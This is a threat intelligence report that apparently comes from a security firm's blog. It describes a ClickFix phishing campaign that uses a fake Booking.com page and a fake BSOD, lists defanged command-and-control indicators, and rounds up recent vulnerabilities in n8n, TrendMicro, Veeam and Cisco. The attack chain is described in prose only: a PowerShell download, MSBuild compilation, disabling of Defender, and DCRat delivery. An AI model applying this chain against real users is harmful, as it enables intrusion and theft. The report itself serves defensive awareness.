This week, we briefed our clients on a new ClickFix campaign that uses an urgent phishing email and a fake Windows Blue Screen of Death to trick the user.
KEY TAKEAWAYS
New ClickFix campaign uses fake Windows BSOD to trick users into running malicious code.
Critical and high-severity vulnerabilities in n8n, TrendMicro, Veeam, and Cisco, plus updates to CISA KEV, patch now!
Last week, security researchers at Securonix disclosed a new ClickFix social engineering campaign they are calling "PHALT#BLYX". In this latest evolution of ClickFix attacks, threat actors are creating fake Windows Blue Screen of Death (BSOD) warnings to trick users into running malicious code. This current campaign was observed targeting the hospitality sector in Europe, however, this attack methodology can and will easily spread to other verticals.
The attack begins with a phishing email impersonating Booking.com, with an urgent message stating a customer is cancelling a reservation. The email uses typical "sense of urgency" phrasings designed to instill panic in the victim. The email link takes the victim to a fake Booking.com site, where the victim is presented with an "error" message saying that the site is taking too long to load. Once the victim clicks the "Refresh Page" button that is presented to them, the browser enters full-screen mode, and displays a fake BSOD error message:
Fig. 1: Fake BSOD Message | Source: Securonix
If the victim follows the steps outlined, they are directed to the legitimate Booking.com site to trick them into thinking the issue is resolved. However, in the background, the PowerShell command that was executed by the victim silently downloads a .NET project file. This file is then compiled using MSBuild.exe. Once executed, the program checks to see if it has administrative privileges. If not, it begins spamming the victim with User Account Control (UAC) prompts. If the victim clicks 'Yes', the program is granted administrative privileges. Once administrative privileges are confirmed, the program adds exclusions to, and eventually disables Microsoft Defender. Finally, it uses Background Intelligent Transfer Service (BITS) to download the final malicious payload (DCRat) and saves it to the C:\ProgramData\ folder. DCRat is a commodity malware sold on Russian hacking forums, gives threat actors remote access to infected devices, and has additional capabilities such as keylogging, reverse shell, and can facilitate download and execution of further malicious payloads.
The researchers at Securonix identified the domains asj77[.]com, asj88[.]com, and asj99[.]com as well as IP 194.169.163[.]140 over port 3535 as the command-and-control server for this specific campaign.
How to Protect Your Organization
As with all phishing and social engineering attacks, user awareness training is crucial. There are a multitude of visual cues users can pay attention to in order to look for these types of attacks:
Other defender detection and prevention opportunities include:
Resources:
Vulnerability Roundup
Several critical vulnerabilities were recently disclosed for n8n, a widely-used open-source automation and workflow platform. The most severe of these vulnerabilities is known as "Ni8mare", a maximum-severity vulnerability that allows for an unauthenticated remote attacker to gain access to sensitive files and data. Due to the nature of how n8n works as an automation platform, this can give threat actors access to API keys, OAuth tokens, database credentials, and more. The vulnerability is tracked as CVE-2026-21858 and affects n8n deployments 1.65.0 up to version 1.121.0. Administrators are urged to patch to version 1.121.0 or higher. Additionally, it is recommended to not expose n8n to the internet unless absolutely necessary.
TrendMicro released a fix for a critical remote code execution vulnerability in Apex Central, their web-based management console that allows for admins to manage multiple TrendMicro products and services. The vulnerability, tracked as CVE-2025-69258, allows for a remote unauthenticated attacker to load a malicious DLL into a "key executable" that leads to code execution with SYSTEM privileges. The flaw affects Apex Central On-Premise instances running on Windows, versions below Build 7190. Administrators are urged to apply the patch as soon as possible, as proof-of-concept exploit code is in the wild.
Veeam recently fixed a remote code execution vulnerability in Veeam Backup & Replication. The vulnerability, tracked as CVE-2025-59740, affects Veeam Backup & Replication versions 13.0.1.180 and all earlier version 13 builds. Successful exploitation requires the threat actor to have administrative Backup or Tape Operator roles. Three other less-severe vulnerabilities are also addressed by this patch. As Veeam Backup & Replication servers are frequently a target of ransomware operators, administrators are urged to patch to version 13.0.1.1071 or higher as soon as possible.
Cisco recently fixed a vulnerability in Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC). The vulnerability, tracked as CVE-2026-20029, affects these products regardless of device configuration. Successful exploitation allows for remote attackers with high privileges (valid administrative credentials) to access sensitive information on the device. Cisco warns that proof-of-concept exploit code for this vulnerability is in the wild. Vulnerable versions and their fixed version of Cisco ISE or ISE-PIC are as follows:
Administrators are urged to apply patches as soon as possible.
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
This report is provided FREE to the cybersecurity community.
Visit our Cyber Threat Intelligence Blog for additional reports.
Subscribe to be notified of future Reports:
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.